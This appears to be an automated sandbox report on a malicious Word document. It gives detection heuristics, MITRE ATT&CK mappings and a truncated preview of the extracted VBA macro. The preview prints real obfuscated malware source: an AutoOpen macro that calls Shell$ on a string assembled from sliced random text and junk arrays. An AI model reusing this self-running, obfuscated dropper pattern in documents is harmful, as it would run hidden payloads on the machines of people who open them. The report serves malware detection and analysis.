MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is indicative of executing a secondary payload. The ClamAV detection and heuristic firings for VBA macros and Shell() calls strongly suggest this document is designed to download and execute malware.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 247764 bytes |
SHA-256: 1187a391dd28e948eba9aa73f7eeca48e542fe56172660f6de93ff5b7a0b35b7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 128 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AYuNbfBaL"
Sub AutoOpen()
wfnLJAFFp = "VzhGnAMtE" + "UriOfWTWJ" + "zSFizZPXp" + "wpjYfWTpS"
Shell$ aLjmEEhVw, 0
QLiFUTWjY = "ihAQrnqHn" + "kmzHrPKND" + "UwLIuqEDK" + "fszmMRAjp"
End Sub
Function aLjmEEhVw()
FpwjzPaM = "jaCFLqnRkN2ZMjIYXidIuXKb2QOTojtwskhizUXjYXAUqHFClUHzVDihkTBBaWzmHVAEHTMTKcRRiZIQkLhUZtcoFzwdTWGCZOMUGAuSH4E4dNZMCF"
uRiqa = Mid(FpwjzPaM, 27, 79)
qOqDcdzulU = Array("HUzcSKca", "UjXdSJEr", "zpozYjZt", "iHVbKwZr", "SvcIjjEm")
qcmWftdkwRf = Array("XXKEfWTF", "UNzswwja", "uGtKpBPX", "JjLXjwKT", "lCbAWVNM")
CUdLf = Array("oPHwwhuV", "PCNamtzW", "ImuzKwZX", "CjHuVjEY", "thWZtSbc")
zSSPvjpGj = "CvzrOPT24HLzJPoH2J1ZlbIfMQrsFJktzvho"
RfIzr = Mid(zSSPvjpGj, 22, 8)
WUpwuikBQS = Array("mpIdikhs", "FErkbOBr", "pjuQazAi", "wphFXXdp", "KRMVovpS")
AFYVsLBjbq = Array("wOpRoTwi", "jijKYKCm", "pZftDcVh", "bBZJBfDu", "ubRLJjui")
PfOSPVLjP = Array("sCZsnSRA", "PajOPvOW", "tIqmtmdA", "bpPwsqcG", "iBBBDcuI")
oBKkZUGRQzq = "JWZtfZraqUhBHofJcouaISAuaDOKATiwjBqbEjDGauISQEEhwESrYmjooNScLjZXmiUGwEFtlnzNJhdWwjMv6fYPFmH1"
KkcPP = Mid(oBKkZUGRQzq, 4, 81)
jCklNaiVWM = Array("kZubzoiw", "MvRBsHkF", "YYQzCUIY", "zajOuNTR", "NhCUsCAm")
tZhmlZ = Array("LRjzZaNX", "QwciLwFP", "QWdZEPEz", "bAnLFQMW", "YimlkLwW")
ElmPJkw = Array("NMwwkpFR", "cmDWYbiv", "NkVZnBRA", "jGGhKTiF", "XHMrRGOl")
AGawPMc = "UbCwdwJKzinaRIwftjFRzTshhQnjwZJTjtsTjjfLi3cEOuQHEl6YO1KZkDX0vsQ9SUUtEu6"
dVfhRPib = Mid(AGawPMc, 6, 35)
wWotAto = Array("uWjTMqzw", "wqYApZjL", "vzPdjXGI", "HwzRPqiH", "VkiQSwns")
AjJPTPOw = Array("JJlUviQz", "XBwTqkCW", "PaLNrfhF", "LRiEvTsw", "JWUZmmMd")
tzwZtEwoi = Array("iBtOtKQl", "hHAsnaBd", "cfIizLBE", "IAJUQckd", "NifpmSMB")
ACpEV = "Xw7fj1IrRFLjPlJ5Dioo17zNYIoWiPWOlpVtvStUurmZPPWPmKwpNZdUtzmiSEEDnbjXnGSLMtzpZKfNoVrPHvhMLAAvjPCqmjlnizbfrncUboviTZqwNpvsuTLmGWaP"
tcHtlKziYdh = Mid(ACpEV, 33, 94)
likNHofB = Array("BtXoSzJj", "VqzGdidW", "zoFtAvUF", "WXiFuLrJ", "THcFoNmI")
DbThKvW = Array("qZzZidzf", "EIqzNSAF", "ZRRuVEpK", "wnnWFYil", "CwCawuat")
ddCoKWI = Array("YwAlUuwA", "HXjWwrnm", "kobqpcZj", "aEuQPZJi", "qXWWDDpE")
laLbjdvKF = "M82m9EoPwnbsZYNGOsjLjvcLkdZGkvtGzhKomdoXhY"
KMvnsnEdhd = Mid(laLbjdvKF, 16, 15)
UhjGrQSGT = Array("rmPirLpK", "JQqHTjDv", "ZULQzflh", "NCjYUQij", "zXzDNroO")
zOtIrw = Array("PkHzjBLH", "UbzisZEM", "BhUpfQqt", "hJIwkAii", "jwAPYmwM")
DSFONnfprY = Array("rYEtSAoZ", "SmBfWzjz", "uORatOWU", "tPBwYpoP", "jIwGMwah")
sjfuZ = "51Ohu7zk2wE2HO7jKXGJnmTQGqsrQMONAHjmdDEihKzQSuawbuzFuizfrmOZiwfFzBQIZkFHTccdmCzMPuPVPJSWKAuroivifuSQdSZrpqmSBTsooCKoiJqoitwYpaFB1lHZ8PwmORdF"
rtrwRVLFc = Mid(sjfuZ, 16, 110)
bISsps = Array("UjdzwCMh", "MBVJUXTc", "CjzDwsAd", "wmvNAdmz", "nkFJkYWq")
jLLzwkJwi = Array("DUjXTiuL", "pVEcwWic", "iAzMHwjj", "OYVkSJrd", "NJAdJdJT")
rUsXr = Array("rjXfYKAR", "BdbkZJjE", "ozIvIKtj", "iaOnWESE", "rfUXbBKE")
YKABwjOjt = "Yl0Q7wwSMPQPFWuudbpc"
hzmQUl = Mid(YKABwjOjt, 7, 8)
mjEomjEfK = Array("XEiphHDD", "ZwpKVNKj", "qqBwvNuz", "KXstoLdm", "oEYDcEzW")
zpDiiNz = Array("WKNaOIji", "UohkAMIK", "JliKPJPO", "TCVQoHEl", "riblzUiB")
jUqbIquMz = Array("nOZAismb", "wOtqZoHN", "vzHMmSpN", "jvsVlXKp", "DcWAkOja")
PQuqiDmpjo = "orBavcdKGtAZAsGtCCwJaDKdSjrdnH5wSjOIR4Gmz"
tKaNuaj = Mid(PQuqiDmpjo, 2, 28)
dWsERrLijEv = Array("QuUaNOMC", "XOpzNWPV", "YLRiARpY", "DEnwSGch", "PjvszOAV")
YUpta = Array("iqwXhKbh", "NBcZwBaz", "FvXIaQkR", "lIkjaXXK", "KwzJTRrs")
VVCPz = Array("cGiQiCkO", "GwmBrsuS", "FjlZavGq", "iROABQjn", "EifUhTnj")
ZDMMGl = "vOaXJqaIQtRtUAQidubzHAKIfmEQHNuKdnF2Ezd9NwsIB88abHhRiTwN93c6jJF"
abaWO = Mid(ZDMMGl, 5, 29)
XChJMCTP = Array("XWZdkVSS", "CjEmfRSh", "zsmMokMq", "QzzMMZll", "tCBEVdGI")
mojDFmCiqVN = Array("wwwVLtHm", "MwVohavn", "JjNkYGFc", "uSsdQNLW", "mdNsmriW")
ZPIufDi = Array("sKAOEzES", "HOumPVks", "qVatAiWw", "mzCDNDBR", "EqsOFrYz")
kBBDzmZOhzk =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.